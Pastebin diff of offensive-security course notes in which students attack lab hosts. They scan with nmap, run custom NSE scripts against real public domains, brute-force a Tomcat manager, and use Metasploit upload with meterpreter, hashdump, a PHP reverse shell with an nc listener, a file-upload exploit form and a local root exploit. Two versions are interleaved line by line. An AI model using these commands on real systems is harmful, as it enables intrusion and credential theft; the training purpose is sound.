SHOW:
|
|
- or go back to the newest paste.
1 | ######################################## | |
2 | # Advanced Pentester Night School # | |
3 | # By Joe McCray of Strategic Security # | |
4 | ######################################## | |
5 | ||
6 | ||
7 | Let's have you connect to the VPN. I wanted to make sure that I did some of the stuff on my local virtual machines because I want you to do the hunting for vulnerable hosts to attack. If I attack the live targets in the lab then I'll end up giving away a lot of the little secrets that I want you to discover. | |
8 | - | # Class Virtual Machine # |
8 | + | |
9 | So, let's start with some lab fun (just a little bit)...lol. Here are the instructions for connecting to the VPN: | |
10 | https://s3.amazonaws.com/infosecaddicts-Files/Strategic-Security-2016-VPN-Info.pdf | |
11 | ||
12 | - | Here is the VMWare virtual machine for the class: |
12 | + | sudo nmap -sP 10.0.0.0/24 |
13 | infosecaddicts | |
14 | - | https://s3.amazonaws.com/infosecaddictsvirtualmachines/Ubuntu-17-10-InfoSecAddictsVM.zip |
14 | + | |
15 | sudo nmap -sL 10.0.0.0/24 | |
16 | - | user: infosecaddicts |
16 | + | |
17 | - | pass: infosecaddicts |
17 | + | |
18 | ||
19 | for i in `seq 1 255`; do ping -c1 10.0.0.$i | tr \\n ' ' | awk '/1 received/ {print $2}'; done | |
20 | - | Let's have you connect to the VPN. I wanted to make sure that I did some of the stuff on my local virtual machines because I want you to do the hunting for vulnerable hosts to attack. |
20 | + | |
21 | - | If I attack the live targets in the lab then I'll end up giving away a lot of the little secrets that I want you to discover. |
21 | + | |
22 | ||
23 | wget --no-check-certificate https://raw.githubusercontent.com/BenDrysdale/ipcrawl/master/ipcrawl.c | |
24 | ||
25 | gcc ipcrawl.c -o ipcrawl | |
26 | ||
27 | - | https://s3.amazonaws.com/infosecaddictsfiles/Strategic-Security-2017-VPN-Info.pdf |
27 | + | |
28 | ||
29 | - | Be sure to use 54.245.178.32/?src=connect for the VPN IP address instead of the one shown in the file |
29 | + | ./ipcrawl 10.0.0.1 10.0.0.254 |
30 | - | vpn username: {first_initial.last_name} example: j.mccray |
30 | + | |
31 | - | vpn password: !@#$vpn4321VPN |
31 | + | |
32 | ||
33 | wget --no-check-certificate https://dl.packetstormsecurity.net/UNIX/scanners/propecia.c | |
34 | ||
35 | - | If you wants some scanning tips you should take a look at the following document: |
35 | + | |
36 | - | https://s3.amazonaws.com/infosecaddictsfiles/LabNetworkScanningV4.pdf |
36 | + | |
37 | sudo cp propecia /bin | |
38 | infosecaddicts | |
39 | ||
40 | propecia 10.0.0 22 | |
41 | ||
42 | propecia 10.0.0 3389 | |
43 | - | ---------------------------Type This----------------------------------- |
43 | + | |
44 | nmap -Pn -sV -T 5 -oG - -p 21,22,80,443,1433,3389 10.0.0.* | grep open | |
45 | ||
46 | nmap -Pn -sV -T 5 -oG - -p 21,22,80,443,1433,3389 10.0.0.* | awk '/open/{print $2 " " $3}' | |
47 | ||
48 | nmap -Pn -sV -T 5 -oG - -p 21,22,80,443,1433,3389 10.0.0.* | awk '/open/{print $2}' | wc -l | |
49 | ||
50 | nmap -Pn -sV -T 5 -oG - -p 21,22,80,443,1433,3389 10.0.0.* | awk '/open/{print $2}' | |
51 | ||
52 | nmap -Pn -sV -T 5 -oG - -p 21,22,80,443,1433,3389 10.0.0.* | awk '/open/{print $2}' > ~/labnet-ip-list.txt | |
53 | ||
54 | cd ~/toolz | |
55 | ||
56 | ||
57 | ||
58 | - | ----------------------------------------------------------------------- |
58 | + | |
59 | # Screenshotting the Web Servers in the Network # | |
60 | ################################################# | |
61 | cd ~/toolz/ | |
62 | - | ####################### |
62 | + | |
63 | - | # Scanning Techniques # |
63 | + | |
64 | - | ####################### |
64 | + | |
65 | - | ---------------------------Type This----------------------------------- |
65 | + | |
66 | - | sudo nmap -sL 172.31.2.0/24 |
66 | + | wget http://download.gna.org/wkhtmltopdf/0.12/0.12.4/wkhtmltox-0.12.4_linux-generic-amd64.tar.xz |
67 | tar xf wkhtmltox-0.12.4_linux-generic-amd64.tar.xz | |
68 | cd wkhtmltox/bin/ | |
69 | sudo cp wkhtmltoimage /usr/local/bin/wkhtmltoimage-i386 | |
70 | ||
71 | ||
72 | cd ~/toolz/ | |
73 | git clone git://github.com/SpiderLabs/Nmap-Tools.git | |
74 | cd Nmap-Tools/NSE/ | |
75 | sudo cp http-screenshot.nse /usr/share/nmap/scripts/ | |
76 | infosecaddicts | |
77 | - | ./ipcrawl 172.31.2.1 172.31.2.254 |
77 | + | |
78 | sudo nmap --script-updatedb | |
79 | infosecaddicts | |
80 | ||
81 | ||
82 | cd ~/toolz/labscreenshots/ | |
83 | sudo nmap -Pn -T 5 -p 80 -A --script=http-screenshot 10.0.0.0/24 -iL /home/infosecaddicts/labnet-ip-list.txt | |
84 | infosecaddicts | |
85 | ||
86 | ||
87 | ||
88 | - | propecia 172.31.2 22 |
88 | + | |
89 | vi screenshots.sh | |
90 | - | propecia 172.31.2 80 |
90 | + | |
91 | #!/bin/bash | |
92 | - | propecia 172.31.2 443 |
92 | + | |
93 | ls -1 *.png | awk -F : '{ print $1":"$2"\n<BR><IMG SRC=\""$1"%3A"$2"\" width=400><BR><BR>"}' >> labnet-port-80-screenshots.html | |
94 | - | propecia 172.31.2 3389 |
94 | + | |
95 | ||
96 | - | nmap -Pn -sV -T 5 -oG - -p 21,22,80,443,1433,3389 172.31.2.* | grep open |
96 | + | |
97 | ||
98 | - | nmap -Pn -sV -T 5 -oG - -p 21,22,80,443,1433,3389 172.31.2.* | awk '/open/{print $2 " " $3}' |
98 | + | |
99 | ||
100 | - | nmap -Pn -sV -T 5 -oG - -p 21,22,80,443,1433,3389 172.31.2.* | awk '/open/{print $2}' | wc -l |
100 | + | |
101 | ||
102 | - | nmap -Pn -sV -T 5 -oG - -p 21,22,80,443,1433,3389 172.31.2.* | awk '/open/{print $2}' |
102 | + | |
103 | ||
104 | - | nmap -Pn -sV -T 5 -oG - -p 21,22,80,443,1433,3389 172.31.2.* | awk '/open/{print $2}' > ~/labnet-ip-list.txt |
104 | + | |
105 | ########################## | |
106 | - | cat ~/labnet-ip-list.txt |
106 | + | |
107 | - | ----------------------------------------------------------------------- |
107 | + | |
108 | sudo nmap -Pn -n --open -p21 --script=banner,ftp-anon,ftp-bounce,ftp-proftpd-backdoor,ftp-vsftpd-backdoor 10.0.0.0/24 | |
109 | infosecaddicts | |
110 | ||
111 | sudo nmap -Pn -n --open -p22 --script=sshv1,ssh2-enum-algos 10.0.0.0/24 | |
112 | infosecaddicts | |
113 | ||
114 | sudo nmap -Pn -n -sU --open -p53 --script=dns-blacklist,dns-cache-snoop,dns-nsec-enum,dns-nsid,dns-random-srcport,dns-random-txid,dns-recursion,dns-service-discovery,dns-update,dns-zeustracker,dns-zone-transfer 10.0.0.0/24 | |
115 | - | ---------------------------Type This----------------------------------- |
115 | + | |
116 | ||
117 | sudo nmap -Pn -n --open -p111 --script=nfs-ls,nfs-showmount,nfs-statfs,rpcinfo 10.0.0.0/24 | |
118 | infosecaddicts | |
119 | ||
120 | sudo nmap -Pn -n --open -p445 --script=msrpc-enum,smb-enum-domains,smb-enum-groups,smb-enum-processes,smb-enum-sessions,smb-enum-shares,smb-enum-users,smb-mbenum,smb-os-discovery,smb-security-mode,smb-server-stats,smb-system-info,smbv2-enabled,stuxnet-detect 10.0.0.0/24 | |
121 | - | wget https://s3.amazonaws.com/infosecaddictsfiles/wkhtmltox-0.12.4_linux-generic-amd64.tar.xz |
121 | + | |
122 | ||
123 | sudo nmap -Pn -n --open -p1433 --script=ms-sql-dump-hashes,ms-sql-empty-password,ms-sql-info 10.0.0.0/24 | |
124 | infosecaddicts | |
125 | ||
126 | sudo nmap -Pn -n --open -p1521 --script=oracle-sid-brute --script oracle-enum-users --script-args oracle-enum-users.sid=ORCL,userdb=orausers.txt 10.0.0.0/24 | |
127 | infosecaddicts | |
128 | ||
129 | sudo nmap -Pn -n --open -p3306 --script=mysql-databases,mysql-empty-password,mysql-info,mysql-users,mysql-variables 10.0.0.0/24 | |
130 | infosecaddicts | |
131 | ||
132 | - | sudo cp http-screenshot.nse /usr/local/share/nmap/scripts/ |
132 | + | sudo nmap -Pn -n --open -p3389 --script=rdp-vuln-ms12-020,rdp-enum-encryption 10.0.0.0/24 |
133 | infosecaddicts | |
134 | ||
135 | sudo nmap -Pn -n --open -p5900 --script=realvnc-auth-bypass,vnc-info 10.0.0.0/24 | |
136 | infosecaddicts | |
137 | ||
138 | sudo nmap -Pn -n --open -p6000-6005 --script=x11-access 10.0.0.0/24 | |
139 | infosecaddicts | |
140 | - | sudo nmap -Pn -T 5 -p 80 -A --script=http-screenshot 172.31.2.0/24 -iL /home/infosecaddicts/labnet-ip-list.txt |
140 | + | |
141 | sudo nmap -Pn -n --open -p27017 --script=mongodb-databases,mongodb-info 10.0.0.0/24 | |
142 | - | ----------------------------------------------------------------------- |
142 | + | |
143 | ||
144 | ||
145 | ||
146 | - | ---------------------------Type This----------------------------------- |
146 | + | |
147 | - | nano screenshots.sh |
147 | + | |
148 | - | ---------------------Paste this into the file-------------------------- |
148 | + | |
149 | ######################### | |
150 | cd ~ | |
151 | echo bob >> list.txt | |
152 | echo jim >> list.txt | |
153 | - | ----------------------------------------------------------------------- |
153 | + | |
154 | echo tim >> list.txt | |
155 | echo admin >> list.txt | |
156 | echo hello >> list.txt | |
157 | - | ---------------------------Type This----------------------------------- |
157 | + | |
158 | echo test >> list.txt | |
159 | echo aaaaaa >> list.txt | |
160 | echo larry >> list.txt | |
161 | - | python -m SimpleHTTPServer |
161 | + | |
162 | - | ----------------------------------------------------------------------- |
162 | + | |
163 | echo john >> list.txt | |
164 | - | --- Now browse to the IP of your Linux machine on port 8000 (http://192.168.200.157:8000/labnet-port-80-screenshots.html): |
164 | + | |
165 | - | http://Ubuntu-VM-IP:8000/labnet-port-80-screenshots.html |
165 | + | |
166 | ############## | |
167 | # Using Nmap # | |
168 | ############## | |
169 | ******** NOTE: Some of these scans may take up to an hour to run... ******** | |
170 | ******** NOTE: Open them in another terminal window and keep going ******** | |
171 | ||
172 | sudo nmap -Pn -sSV -A -p- -T5 10.0.0.120 (long scan) | |
173 | - | ---------------------------Type This----------------------------------- |
173 | + | |
174 | - | sudo nmap -Pn -n --open -p21 --script=banner,ftp-anon,ftp-bounce,ftp-proftpd-backdoor,ftp-vsftpd-backdoor 172.31.2.0/24 |
174 | + | sudo nmap -sV -Pn -p25 --script=banner,ftp-anon,ftp-bounce,ftp-proftpd-backdoor,ftp-vsftpd-backdoor 10.0.0.120 |
175 | ||
176 | sudo nmap -sV -Pn -p111 --script=nfs-ls,nfs-showmount,nfs-statfs,rpcinfo 10.0.0.120 | |
177 | - | sudo nmap -Pn -n --open -p22 --script=sshv1,ssh2-enum-algos 172.31.2.0/24 |
177 | + | |
178 | sudo nmap -sV -Pn -p80,8080,8081,9000 --script=http-* 10.0.0.120 (long scan) | |
179 | ||
180 | - | sudo nmap -Pn -n -sU --open -p53 --script=dns-blacklist,dns-cache-snoop,dns-nsec-enum,dns-nsid,dns-random-srcport,dns-random-txid,dns-recursion,dns-service-discovery,dns-update,dns-zeustracker,dns-zone-transfer 172.31.2.0/24 |
180 | + | sudo nmap -sV -Pn -p1322,59894 --script=sshv1,ssh2-enum-algos 10.0.0.120 |
181 | ||
182 | ||
183 | - | sudo nmap -Pn -n --open -p111 --script=nfs-ls,nfs-showmount,nfs-statfs,rpcinfo 172.31.2.0/24 |
183 | + | ******** NOTE: Some of these scans may take up to an hour to run... ******** |
184 | ******** NOTE: Open them in another terminal window and keep going ******** | |
185 | ||
186 | - | sudo nmap -Pn -n --open -p445 --script=msrpc-enum,smb-enum-domains,smb-enum-groups,smb-enum-processes,smb-enum-sessions,smb-enum-shares,smb-enum-users,smb-mbenum,smb-os-discovery,smb-security-mode,smb-server-stats,smb-system-info,smbv2-enabled,stuxnet-detect 172.31.2.0/24 |
186 | + | |
187 | ||
188 | ######################### | |
189 | - | sudo nmap -Pn -n --open -p1433 --script=ms-sql-dump-hashes,ms-sql-empty-password,ms-sql-info 172.31.2.0/24 |
189 | + | # Playing with Nmap NSE # |
190 | ######################### | |
191 | ||
192 | - | sudo nmap -Pn -n --open -p1521 --script=oracle-sid-brute --script oracle-enum-users --script-args oracle-enum-users.sid=ORCL,userdb=orausers.txt 172.31.2.0/24 |
192 | + | nmap -Pn -p80 --script ip-geolocation-* infosecaddicts.com |
193 | ||
194 | nmap -p80 --script dns-brute infosecaddicts.com | |
195 | - | sudo nmap -Pn -n --open -p3306 --script=mysql-databases,mysql-empty-password,mysql-info,mysql-users,mysql-variables 172.31.2.0/24 |
195 | + | |
196 | nmap --script http-robtex-reverse-ip secore.info | |
197 | ||
198 | - | sudo nmap -Pn -n --open -p3389 --script=rdp-vuln-ms12-020,rdp-enum-encryption 172.31.2.0/24 |
198 | + | nmap -Pn -p80 --script=http-headers infosecaddicts.com |
199 | ||
200 | ||
201 | - | sudo nmap -Pn -n --open -p5900 --script=realvnc-auth-bypass,vnc-info 172.31.2.0/24 |
201 | + | ls /usr/share/nmap/scripts | grep http |
202 | nmap -Pn -p80 --script=http-* infosecaddicts.com | |
203 | ||
204 | - | sudo nmap -Pn -n --open -p6000-6005 --script=x11-access 172.31.2.0/24 |
204 | + | |
205 | ||
206 | ||
207 | - | sudo nmap -Pn -n --open -p27017 --script=mongodb-databases,mongodb-info 172.31.2.0/24 |
207 | + | |
208 | # Writing Your Own Nmap NSE Scripts # | |
209 | ##################################### | |
210 | ||
211 | - | sudo nmap -sV -oA nse --script-args=unsafe=1 --script-args=unsafe --script "auth,brute,discovery,exploit,external,fuzzer,intrusive,malware,safe,version,vuln and not(http-slowloris or http-brute or http-enum or http-form-fuzzer)" 172.31.2.0/24 |
211 | + | |
212 | ---------------------------------------------------------------------- | |
213 | - | ----------------------------------------------------------------------- |
213 | + | sudo vi /usr/share/nmap/scripts/intro-nse.nse |
214 | ||
215 | -- The Head Section -- | |
216 | -- The Rule Section -- | |
217 | portrule = function(host, port) | |
218 | return port.protocol == "tcp" | |
219 | and port.number == 80 | |
220 | and port.state == "open" | |
221 | - | ################## |
221 | + | |
222 | - | # Day 1 Homework # |
222 | + | |
223 | - | ################## |
223 | + | |
224 | - | Take screenshots of you performing all of the tasks above. |
224 | + | |
225 | return "February class bundle!" | |
226 | - | In order to receive your certificate of proficiency you must complete all of the tasks covered in the Advanced Pentester Night School pastebin (http://pastebin.com/qnmbj04m). |
226 | + | |
227 | ---------------------------------------------------------------------- | |
228 | - | Submit the results via email in an MS Word document with (naming convention example: YourFirstName-YourLastName-Pentester-Night-School-Day1-Homework.docx) |
228 | + | |
229 | - Ok, now that we've made that change let's run the script | |
230 | sudo nmap --script=/usr/share/nmap/scripts/intro-nse.nse infosecaddicts.com -p 22,80,443 | |
231 | ||
232 | ||
233 | - | IMPORTANT NOTE: |
233 | + | |
234 | - | Your homework/challenges must be submitted via email to both (joe-at-strategicsec-.-com and ivana-at-strategicsec-.-com) by midnight EST this coming Sunday. |
234 | + | |
235 | ||
236 | - | ---------------------------------------------------------------------------------------------------------------------- |
236 | + | |
237 | ---------------------------------------------------------------------- | |
238 | - | -------------------------------------------------------------------------------- |
238 | + | sudo vi /usr/share/nmap/scripts/intro-nse.nse |
239 | - | - Host Discovery - |
239 | + | |
240 | - | - ping sweep |
240 | + | |
241 | - | - tcp ping |
241 | + | |
242 | - | - zone transfer |
242 | + | |
243 | -- The Rule Section -- | |
244 | - | - Service Discovery - |
244 | + | |
245 | - | - nmap -sS <IP-RANGE> |
245 | + | |
246 | ||
247 | - | - Service Version Discovery - |
247 | + | |
248 | - | - nmap -sV <IP-RANGE> |
248 | + | |
249 | return "February class bundle!" | |
250 | - | - Vulnerability Research |
250 | + | |
251 | - | - exploit-db.com |
251 | + | |
252 | ||
253 | - | --------------didn't find anything exploitable--------------------------------- |
253 | + | |
254 | sudo nmap --script=/usr/share/nmap/scripts/intro-nse.nse infosecaddicts.com -p 22,80,443 | |
255 | - | - Deep enumeration |
255 | + | |
256 | - | - Linux (SUNRPC/NFS) |
256 | + | |
257 | - | - Win (SMB) |
257 | + | |
258 | ||
259 | - | - Enumerate the webserver ports |
259 | + | |
260 | - | - Vulnerability Scan (Nikto) |
260 | + | |
261 | - | - Directory Bruteforce (dirb) |
261 | + | |
262 | - | - Analyze source code of each page |
262 | + | OK, now let's have some fun with my buddy Carlos Perez's website which you should have been looking at quite a lot if you were trying to get Ruby 2.1.5 working last year. |
263 | ||
264 | - | - Bruteforce ALL services |
264 | + | |
265 | sudo vi /usr/share/nmap/scripts/intro-nse.nse | |
266 | ||
267 | - | ################## |
267 | + | |
268 | - | # Attacking Sedna # |
268 | + | |
269 | local http = require "http" | |
270 | ||
271 | - | Attack steps: |
271 | + | |
272 | - | ------------- |
272 | + | |
273 | ||
274 | -- The Action Section -- | |
275 | action = function(host, port) | |
276 | - | Step 1: Ping sweep the target network |
276 | + | |
277 | - | ---------------------------Type This----------------------------------- |
277 | + | |
278 | - | nmap -sP 172.31.2.0/24 |
278 | + | |
279 | - | ----------------------------------------------------------------------- |
279 | + | |
280 | ||
281 | end | |
282 | ---------------------------------------------------------------------- | |
283 | ||
284 | - Ok, now that we've made that change let's run the script | |
285 | sudo nmap --script=/usr/share/nmap/scripts/intro-nse.nse darkoperator.com -p 22,80,443 | |
286 | - | Step 2: Port scan/Bannergrab the target host |
286 | + | |
287 | - | ---------------------------Type This----------------------------------- |
287 | + | |
288 | - | sudo nmap -sV 172.31.2.86 |
288 | + | |
289 | - | ----------------------------------------------------------------------- |
289 | + | |
290 | ---------------------------------------------------------------------- | |
291 | sudo vi /usr/share/nmap/scripts/intro-nse.nse | |
292 | - | PORT STATE SERVICE VERSION |
292 | + | |
293 | - | 22/tcp open ssh (protocol 2.0) |
293 | + | |
294 | - | 53/tcp open domain ISC BIND 9.9.5-3-Ubuntu |
294 | + | |
295 | - | 80/tcp open http Apache httpd 2.4.7 ((Ubuntu)) |
295 | + | |
296 | - | 110/tcp open pop3 Dovecot pop3d |
296 | + | |
297 | - | 111/tcp open rpcbind 2-4 (RPC #100000) |
297 | + | |
298 | - | 139/tcp open netbios-ssn Samba smbd 3.X (workgroup: SEDNA) |
298 | + | |
299 | - | 143/tcp open imap Dovecot imapd |
299 | + | |
300 | - | 445/tcp open netbios-ssn Samba smbd 3.X (workgroup: SEDNA) |
300 | + | |
301 | - | 514/tcp filtered shell |
301 | + | |
302 | - | 993/tcp open ssl/imap Dovecot imapd |
302 | + | |
303 | - | 995/tcp open ssl/pop3 Dovecot pop3d |
303 | + | |
304 | - | 8080/tcp open http Apache Tomcat/Coyote JSP engine 1.1 |
304 | + | |
305 | - | 1 service unrecognized despite returning data. If you know the service/version, please submit the following fingerprint at http://www.insecure.org/cgi-bin/servicefp-submit.cgi : |
305 | + | |
306 | - | SF-Port22-TCP:V=6.40%I=7%D=1/26%Time=5A6B4540%P=x86_64-pc-linux-gnu%r(NULL |
306 | + | |
307 | - | SF:,29,"SSH-2\.0-OpenSSH_6\.6\.1p1\x20Ubuntu-2ubuntu2\r\n"); |
307 | + | |
308 | end | |
309 | - | Service detection performed. Please report any incorrect results at http://nmap.org/submit/ . |
309 | + | |
310 | - | Nmap done: 1 IP address (1 host up) scanned in 246.11 seconds |
310 | + | |
311 | ---------------------------------------------------------------------- | |
312 | ||
313 | - Ok, now that we've made that change let's run the script | |
314 | sudo nmap --script=/usr/share/nmap/scripts/intro-nse.nse darkoperator.com -p 22,80,443 | |
315 | ||
316 | ||
317 | ||
318 | ||
319 | ||
320 | - | Step 3: Vulnerability scan the webserver ports |
320 | + | |
321 | - | ---------------------------Type This----------------------------------- |
321 | + | |
322 | ||
323 | ||
324 | - | rm -rf nikto* |
324 | + | |
325 | sudo vi /usr/share/nmap/scripts/intro-nse.nse | |
326 | - | git clone https://github.com/sullo/nikto.git Nikto2 |
326 | + | |
327 | -- The Head Section -- | |
328 | - | cd Nikto2/program |
328 | + | |
329 | local http = require "http" | |
330 | - | perl nikto.pl -h 172.31.2.86 |
330 | + | |
331 | ||
332 | - | perl nikto.pl -h 172.31.2.86:8080 |
332 | + | |
333 | - | ----------------------------------------------------------------------- |
333 | + | |
334 | ||
335 | -- The Action Section -- | |
336 | action = function(host, port) | |
337 | ||
338 | local uri = "/installing-metasploit-in-ubunt/" | |
339 | - | Step 4: Perform directory bruteforce against the target host |
339 | + | |
340 | - | ---------------------------Type This----------------------------------- |
340 | + | |
341 | - | wget https://dl.packetstormsecurity.net/UNIX/cgi-scanners/Webr00t.pl |
341 | + | |
342 | local title = string.match(response.body, "Installing Metasploit in Ubuntu and Debian") | |
343 | - | perl Webr00t.pl -h 172.31.2.86 -v |
343 | + | |
344 | - | ----------------------------------------------------------------------- |
344 | + | |
345 | ||
346 | end | |
347 | ---------------------------------------------------------------------- | |
348 | - | or with dirbuster (dirb) |
348 | + | |
349 | - Ok, now that we've made that change let's run the script | |
350 | sudo nmap --script=/usr/share/nmap/scripts/intro-nse.nse darkoperator.com -p 22,80,443 | |
351 | ||
352 | ||
353 | - | ---------------------------Type This----------------------------------- |
353 | + | |
354 | ||
355 | ||
356 | - | git clone https://github.com/v0re/dirb.git |
356 | + | |
357 | ||
358 | - | cd dirb/ |
358 | + | |
359 | sudo vi /usr/share/nmap/scripts/intro-nse.nse | |
360 | - | ./configure |
360 | + | |
361 | -- The Head Section -- | |
362 | - | make |
362 | + | |
363 | local http = require "http" | |
364 | - | dirb |
364 | + | |
365 | ||
366 | - | ./dirb http://172.31.2.86 wordlists/big.txt |
366 | + | |
367 | - | ----------------------------------------------------------------------- |
367 | + | |
368 | ||
369 | - | ### dirb output ### |
369 | + | |
370 | - | ==> DIRECTORY: http://172.31.2.86/blocks/ |
370 | + | |
371 | - | ==> DIRECTORY: http://172.31.2.86/files/ |
371 | + | |
372 | - | ==> DIRECTORY: http://172.31.2.86/modules/ |
372 | + | |
373 | - | ==> DIRECTORY: http://172.31.2.86/system/ |
373 | + | |
374 | - | ==> DIRECTORY: http://172.31.2.86/themes/ |
374 | + | |
375 | if ( response.status == 200 ) then | |
376 | - | + http://172.31.2.86/robots.txt (CODE:200|SIZE:36) |
376 | + | |
377 | - | + http://172.31.2.86/server-status (CODE:403|SIZE:291) |
377 | + | |
378 | - | ### dirb output ### |
378 | + | |
379 | return "Vulnerable" | |
380 | else | |
381 | return "Not Vulnerable" | |
382 | end | |
383 | end | |
384 | - | Browsed each of the directories and found that inside of the /themes folder contained the vulnerable application Builder Engine 3.5.0 |
384 | + | |
385 | ||
386 | - | An exploit for this application can be found at: |
386 | + | |
387 | - | https://www.exploit-db.com/exploits/40390/ |
387 | + | |
388 | - Ok, now that we've made that change let's run the script | |
389 | sudo nmap --script=/usr/share/nmap/scripts/intro-nse.nse darkoperator.com -p 22,80,443 | |
390 | ||
391 | ||
392 | ||
393 | - | -------------------save this a "BuilderEngine.html"------------------- |
393 | + | |
394 | - | <html> |
394 | + | |
395 | - | <body> |
395 | + | |
396 | - | <form method="post" action="http://172.31.2.86/themes/dashboard/assets/plugins/jquery-file-upload/server/php/" |
396 | + | |
397 | ||
398 | - | enctype="multipart/form-data"> |
398 | + | |
399 | - | <input type="file" name="files[]" /> |
399 | + | |
400 | - | <input type="submit" value="send" /> |
400 | + | |
401 | - | </form> |
401 | + | |
402 | - | </body> |
402 | + | ******** Attacking Kevgir ******** |
403 | - | </html> |
403 | + | I figured I've give you something fun to play with. |
404 | - | ----------------------------------------------------------------------- |
404 | + | |
405 | ||
406 | ||
407 | - | Download this webshell (http://pentestmonkey.net/tools/php-reverse-shell/php-reverse-shell-1.0.tar.gz) to your local machine. |
407 | + | ############### |
408 | # Using Nikto # | |
409 | - | Change the IP address in the source code of the webshell to another server in the lab network that you have root access to. |
409 | + | ############### |
410 | cd ~/toolz/nikto-2.1.1 | |
411 | - | On the other server run: |
411 | + | |
412 | - | nc -lvp 1234 |
412 | + | perl nikto.pl -update |
413 | ||
414 | - | Then upload the pentestmonkey reverseshell to .86 |
414 | + | perl nikto.pl -h 10.0.0.120 |
415 | ||
416 | - | ============================================ Attacking another server because I need a reverse shell ========================================= |
416 | + | perl nikto.pl -h 10.0.0.120:8080 |
417 | ||
418 | perl nikto.pl -h 10.0.0.120:8081 | |
419 | ||
420 | perl nikto.pl -h 10.0.0.120:9000 | |
421 | ||
422 | ||
423 | ||
424 | ||
425 | #################### | |
426 | - | ---------------------------Type This----------------------------------- |
426 | + | # Using Metasploit # |
427 | - | sudo nano /usr/share/nmap/scripts/intro-nse.nse |
427 | + | #################### |
428 | - | ----------------------------------------------------------------------- |
428 | + | |
429 | - | - or if you are on a newer version of nmap - |
429 | + | |
430 | - | ---------------------------Type This----------------------------------- |
430 | + | |
431 | - | sudo nano /usr/local/share/nmap/scripts/intro-nse.nse |
431 | + | |
432 | - | ---------------------Paste this into the file-------------------------- |
432 | + | use auxiliary/scanner/http/http_version |
433 | ||
434 | set RHOSTS 10.0.0.120 | |
435 | ||
436 | set RPORT 8080 | |
437 | ||
438 | run | |
439 | ||
440 | ||
441 | ------------------------------- | |
442 | ||
443 | - | return "Network Pentester Night School!" |
443 | + | use auxiliary/scanner/http/tomcat_enum |
444 | ||
445 | set RHOSTS 10.0.0.120 | |
446 | ||
447 | set RPORT 8080 | |
448 | - | ---------------------------Type This----------------------------------- |
448 | + | |
449 | run | |
450 | - | ----------------------------------------------------------------------- |
450 | + | |
451 | - | - or if you are on a newer version of nmap - |
451 | + | |
452 | - | ---------------------------Type This----------------------------------- |
452 | + | |
453 | - | sudo nmap --script=/usr/local/share/nmap/scripts/intro-nse.nse infosecaddicts.com -p 22,80,443 |
453 | + | |
454 | - | ----------------------------------------------------------------------- |
454 | + | |
455 | #################### | |
456 | # Attacking Tomcat # | |
457 | #################### | |
458 | cd ~/toolz/metasploit | |
459 | - | ---------------------------Type This----------------------------------- |
459 | + | |
460 | - | sudo nano /usr/share/nmap/scripts/intro-nse.nse |
460 | + | |
461 | - | ----------------------------------------------------------------------- |
461 | + | |
462 | - | - or if you are on a newer version of nmap - |
462 | + | use auxiliary/scanner/http/http_version |
463 | - | ---------------------------Type This----------------------------------- |
463 | + | |
464 | - | sudo nano /usr/local/share/nmap/scripts/intro-nse.nse |
464 | + | set RHOSTS 10.0.0.120 |
465 | - | ---------------------Paste this into the file-------------------------- |
465 | + | |
466 | set RPORT 8080 | |
467 | ||
468 | run | |
469 | ||
470 | ||
471 | ||
472 | ||
473 | ||
474 | use auxiliary/scanner/http/tomcat_mgr_login | |
475 | - | return "Network Pentester Night School!" |
475 | + | |
476 | set USERNAME tomcat | |
477 | ||
478 | set USERPASS_FILE /home/infosecaddicts/list.txt | |
479 | ||
480 | - | --------------------------Type This----------------------------------- |
480 | + | set STOP_ON_SUCCESS true |
481 | - | udo nmap --script=/usr/share/nmap/scripts/intro-nse.nse infosecaddicts.com -p 22,80,443 |
481 | + | |
482 | - | ----------------------------------------------------------------------- |
482 | + | set RHOSTS 10.0.0.120 |
483 | - | - or if you are on a newer version of nmap - |
483 | + | |
484 | - | ---------------------------Type This----------------------------------- |
484 | + | set RPORT 8080 |
485 | - | sudo nmap --script=/usr/local/share/nmap/scripts/intro-nse.nse infosecaddicts.com -p 22,80,443 |
485 | + | |
486 | - | ----------------------------------------------------------------------- |
486 | + | run |
487 | ||
488 | ||
489 | ||
490 | ||
491 | use exploit/multi/http/tomcat_mgr_upload | |
492 | ||
493 | - | - OK, now let's have some fun with my buddy Carlos Perez's website which you should have been looking at quite a lot if you were trying to get Ruby 2.1.5 working last year. |
493 | + | set USERNAME tomcat |
494 | ||
495 | - | ---------------------------Type This----------------------------------- |
495 | + | set PASSWORD tomcat |
496 | - | sudo nano /usr/share/nmap/scripts/intro-nse.nse |
496 | + | |
497 | - | ----------------------------------------------------------------------- |
497 | + | set RHOST 10.0.0.120 |
498 | - | - or if you are on a newer version of nmap - |
498 | + | |
499 | - | ---------------------------Type This----------------------------------- |
499 | + | set RPORT 8080 |
500 | - | sudo nano /usr/local/share/nmap/scripts/intro-nse.nse |
500 | + | |
501 | - | ---------------------Paste this into the file-------------------------- |
501 | + | set PATH /manager/html |
502 | ||
503 | set PAYLOAD java/meterpreter/bind_tcp | |
504 | ||
505 | exploit | |
506 | ||
507 | ||
508 | run post/linux/gather/checkvm | |
509 | ||
510 | run post/linux/gather/enum_configs | |
511 | ||
512 | run post/linux/gather/enum_protections | |
513 | ||
514 | run post/linux/gather/enum_system | |
515 | ||
516 | run post/linux/gather/enum_users_history | |
517 | ||
518 | run post/linux/gather/hashdump | |
519 | ||
520 | - | --------------------------Type This----------------------------------- |
520 | + | shell |
521 | - | sudo nmap --script=/usr/share/nmap/scripts/intro-nse.nse www.darkoperator.com -p 22,80,443 |
521 | + | |
522 | - | ----------------------------------------------------------------------- |
522 | + | /bin/bash |
523 | - | - or if you are on a newer version of nmap - |
523 | + | |
524 | - | ---------------------------Type This----------------------------------- |
524 | + | id |
525 | - | sudo nmap --script=/usr/local/share/nmap/scripts/intro-nse.nse www.darkoperator.com -p 22,80,443 |
525 | + | |
526 | - | ----------------------------------------------------------------------- |
526 | + | uname -a |
527 | ||
528 | dpkg -l | |
529 | ||
530 | - | ---------------------------Type This----------------------------------- |
530 | + | cd /tmp |
531 | - | sudo nano /usr/share/nmap/scripts/intro-nse.nse |
531 | + | |
532 | - | ----------------------------------------------------------------------- |
532 | + | pwd |
533 | - | - or if you are on a newer version of nmap - |
533 | + | |
534 | - | ---------------------------Type This----------------------------------- |
534 | + | |
535 | - | sudo nano /usr/local/share/nmap/scripts/intro-nse.nse |
535 | + | cat >> exploit.c << out |
536 | - | ---------------------Paste this into the file-------------------------- |
536 | + | |
537 | **************paste in the content from here ***************** | |
538 | https://raw.githubusercontent.com/offensive-security/exploit-database/master/platforms/linux/local/39166.c | |
